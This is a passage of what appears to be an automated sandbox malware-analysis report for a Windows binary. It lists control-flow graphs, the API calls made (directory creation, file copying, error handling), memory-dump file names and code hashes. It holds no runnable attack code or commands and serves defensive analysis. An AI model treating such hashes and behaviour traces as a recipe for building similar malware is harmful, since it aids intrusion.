                                    • Part of subcall function 00906CA0: GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0087ED06
                                    • Part of subcall function 00906CA0: std::_Throw_Cpp_error.LIBCPMT ref: 00906D4F
                                    • Part of subcall function 00906CA0: std::_Throw_Cpp_error.LIBCPMT ref: 00906D60
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0087EDED
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0087F06D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$Cpp_errorThrow_std::_$ErrorLast
                                  • String ID:
                                  • API String ID: 411135664-0
                                  • Opcode ID: f114cc57791efb5996a1c8309defffddfda4bf62da046e28fdb568f2a08e1f01
                                  • Instruction ID: e04a53e6d28450f9f0bae6d2b0a93ab5c2170087ba997398154639270ee51de7
                                  • Opcode Fuzzy Hash: f114cc57791efb5996a1c8309defffddfda4bf62da046e28fdb568f2a08e1f01
                                  • Instruction Fuzzy Hash: ACA213B0D042689BCB25DB68CD95BDDBBB4BF54304F4080E9D44AA7282EB705F88DF56

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5532 906770-9067c3 call 852b99 5535 906be5-906be7 call 852534 5532->5535 5536 9067c9-9067d3 5532->5536 5539 906bec-906bf8 call 852534 5535->5539 5538 9067d9-906822 5536->5538 5536->5539 5541 906828-90682e 5538->5541 5542 906bfd call 822c60 5538->5542 5539->5542 5544 906830 5541->5544 5545 906832-906854 call 83e8a0 5541->5545 5547 906c02 call 858c70 5542->5547 5544->5545 5550 906882-9068fe call 822df0 call aa63db 5545->5550 5551 906856-906862 5545->5551 5552 906c07-906c0f call 858c70 5547->5552 5563 906900-906909 5550->5563 5553 906864-906872 5551->5553 5554 906878-90687f call 8538f3 5551->5554 5553->5547 5553->5554 5554->5550 5564 906910-906915 5563->5564 5564->5564 5565 906917-906922 5564->5565 5566 906924-906927 5565->5566 5567 90692d-906930 5565->5567 5566->5567 5568 906aae-906ab9 call aa2845 5566->5568 5569 906932-906935 5567->5569 5570 906943-906969 5567->5570 5576 906abe-906ac1 5568->5576 5569->5570 5571 906937-90693d 5569->5571 5570->5542 5572 90696f-906975 5570->5572 5571->5568 5571->5570 5574 906977 5572->5574 5575 906979-9069a1 call 83e8a0 5572->5575 5574->5575 5582 9069a4-9069a9 5575->5582 5576->5563 5577 906ac7-906adb call 9ae4f3 5576->5577 5583 906b2c-906b36 5577->5583 5584 906add-906ae3 5577->5584 5582->5582 5585 9069ab-906a59 call 838f00 call 822df0 * 3 5582->5585 5586 906b64-906b80 5583->5586 5587 906b38-906b44 5583->5587 5588 906ae5 5584->5588 5589 906ae7-906af5 call a11251 5584->5589 5619 906a79-906a92 call a61bb5 5585->5619 5620 906a5b-906a6e call 906770 5585->5620 5594 906b82-906b8e 5586->5594 5595 906baa-906be4 call 852baa 5586->5595 5591 906b46-906b54 5587->5591 5592 906b5a-906b61 call 8538f3 5587->5592 5588->5589 5604 906b02-906b06 5589->5604 5605 906af7-906b00 5589->5605 5591->5552 5591->5592 5592->5586 5599 906ba0-906ba7 call 8538f3 5594->5599 5600 906b90-906b9e 5594->5600 5599->5595 5600->5552 5600->5599 5609 906b08 5604->5609 5610 906b0a-906b1e call a500a6 5604->5610 5605->5583 5609->5610 5610->5583 5626 906b20-906b28 GetLastError 5619->5626 5627 906a98-906aac call 9af12a 5619->5627 5620->5583 5625 906a74-906a77 5620->5625 5625->5568 5626->5583 5627->5568 5627->5626
                                  APIs
                                  • GetLastError.KERNEL32(00000000,?,00000080,?,?,009A94F8,?,?,?,00985B0C,00000001,?,009A94F8,?,?), ref: 00906B20
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00906BE7
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00906BF8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Cpp_errorThrow_std::_$ErrorLast
                                  • String ID: \*.*
                                  • API String ID: 2454169095-1173974218
                                  • Opcode ID: df4abf59d4ac9b4746c5ac838a2c26a20828a95e2c20eecf3e4e726238ac2553
                                  • Instruction ID: ab5a4fbe3da0bb018020734767029dfb8e9e8ae6388323a69533537e3b256f6e
                                  • Opcode Fuzzy Hash: df4abf59d4ac9b4746c5ac838a2c26a20828a95e2c20eecf3e4e726238ac2553
                                  • Instruction Fuzzy Hash: E6D101B0C04249CFDB14DFA8C9457EDBBB4FF56304F208259E454AB2D2D7759A88CB92

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5630 a666f9-a66702 5631 8f6d19-8f6d31 call 9f435e CopyFileA 5630->5631 5632 a66708-a66728 5630->5632 5637 8f6d73-8f6d85 5631->5637 5638 8f6d33-8f6d38 GetLastError 5631->5638 5633 a51213-a5121c 5632->5633 5634 a6672e-a6674f 5632->5634 5639 8f6d5f-8f6d72 5638->5639 5640 8f6d3a-8f6d5e call 9077e0 5638->5640
                                  APIs
                                  • CopyFileA.KERNEL32(?,?,00000000,009C2BFA,009C578B,?,06859C8B,009B3F3E,F9288CB2,?,00A28108,?,009B98E9,1E234789,44205A07), ref: 008F6D25
                                  • GetLastError.KERNEL32(?,06859C8B,009B3F3E,F9288CB2,?,00A28108,?,009B98E9,1E234789,44205A07), ref: 008F6D33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: CopyErrorFileLast
                                  • String ID: 3
                                  • API String ID: 374144340-1842515611
                                  • Opcode ID: 85f1369ccc0f6863937ec9a762fd54220472d67f9a29f096dda931137f3075cb
                                  • Instruction ID: 7b2c592412788183cd5c08efd42ef79cd681a13de7344ecab206c6a58e0e5533
                                  • Opcode Fuzzy Hash: 85f1369ccc0f6863937ec9a762fd54220472d67f9a29f096dda931137f3075cb
                                  • Instruction Fuzzy Hash: A3213532E0C348EBDB119B69AC817DCFBA4FF85760F5009AEF95593240DB76A811CB41

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5644 8f6ba0-8f6bd8 GetLastError 5645 8f6bde-8f6bf1 5644->5645 5646 8f6d19-8f6d31 call 9f435e CopyFileA 5644->5646 5647 8f6bf4-8f6bf9 5645->5647 5652 8f6d73-8f6d85 5646->5652 5653 8f6d33-8f6d38 GetLastError 5646->5653 5647->5647 5649 8f6bfb-8f6c5a call 849070 call 8559b0 call 9ddbe8 5647->5649 5664 8f6cf4-8f6d13 call ab7227 call acb5e0 call 8388d0 5649->5664 5665 8f6c60-8f6c9b call 835eb0 call a81ddf 5649->5665 5654 8f6d5f-8f6d72 5653->5654 5655 8f6d3a-8f6d5e call 9077e0 5653->5655 5664->5646 5674 8f6c9d-8f6cc3 call a21c50 5665->5674 5675 8f6ce2-8f6cef call 8388d0 5665->5675 5681 8f6ccd-8f6cd1 5674->5681 5682 8f6cc5-8f6ccb 5674->5682 5675->5664 5681->5675 5683 8f6cd3-8f6ce0 call a0c9e3 5681->5683 5682->5675 5682->5681 5683->5675
                                  APIs
                                  • GetLastError.KERNEL32(?,00000000), ref: 008F6BD3
                                  • CopyFileA.KERNEL32(?,?,00000000,009C2BFA,009C578B,?,06859C8B,009B3F3E,F9288CB2,?,00A28108,?,009B98E9,1E234789,44205A07), ref: 008F6D25
                                  • GetLastError.KERNEL32(?,06859C8B,009B3F3E,F9288CB2,?,00A28108,?,009B98E9,1E234789,44205A07), ref: 008F6D33
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CopyFile
                                  • String ID:
                                  • API String ID: 936320341-0
                                  • Opcode ID: 056d7ed57dde67e0134b2212fa3de8e21e04cb6180a4e56f93d5e0e311f57f6e
                                  • Instruction ID: 530c29330648cda20912d053120deae62111ac06434bc6e0beea53a387ad8f12
                                  • Opcode Fuzzy Hash: 056d7ed57dde67e0134b2212fa3de8e21e04cb6180a4e56f93d5e0e311f57f6e
                                  • Instruction Fuzzy Hash: F551BE72D0121DABDB21DBA4CD41BEEBBB8FF44320F104265E654F7281E775AE058BA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5686 906ca0-906cd5 call 852b99 5689 906cd7-906ce1 5686->5689 5690 906d4d-906d4f call 852534 5686->5690 5691 906ce3-906ce8 5689->5691 5692 906d54-906d65 call 852534 5689->5692 5690->5692 5694 906d25 5691->5694 5695 906cea-906cef 5691->5695 5698 906d27-906d4c call 852baa 5694->5698 5699 906cf0-906cf5 5695->5699 5699->5699 5701 906cf7-906cf9 5699->5701 5701->5694 5702 906cfb-906cfd call 9aa5df 5701->5702 5705 906d02-906d05 5702->5705 5706 906d21-906d23 5705->5706 5707 906d07-906d10 GetLastError 5705->5707 5706->5698 5707->5706 5708 906d12-906d15 5707->5708 5708->5706 5709 906d17-906d1a 5708->5709 5709->5706 5710 906d1c-906d1f 5709->5710 5710->5694 5710->5706
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00906D4F
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00906D60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
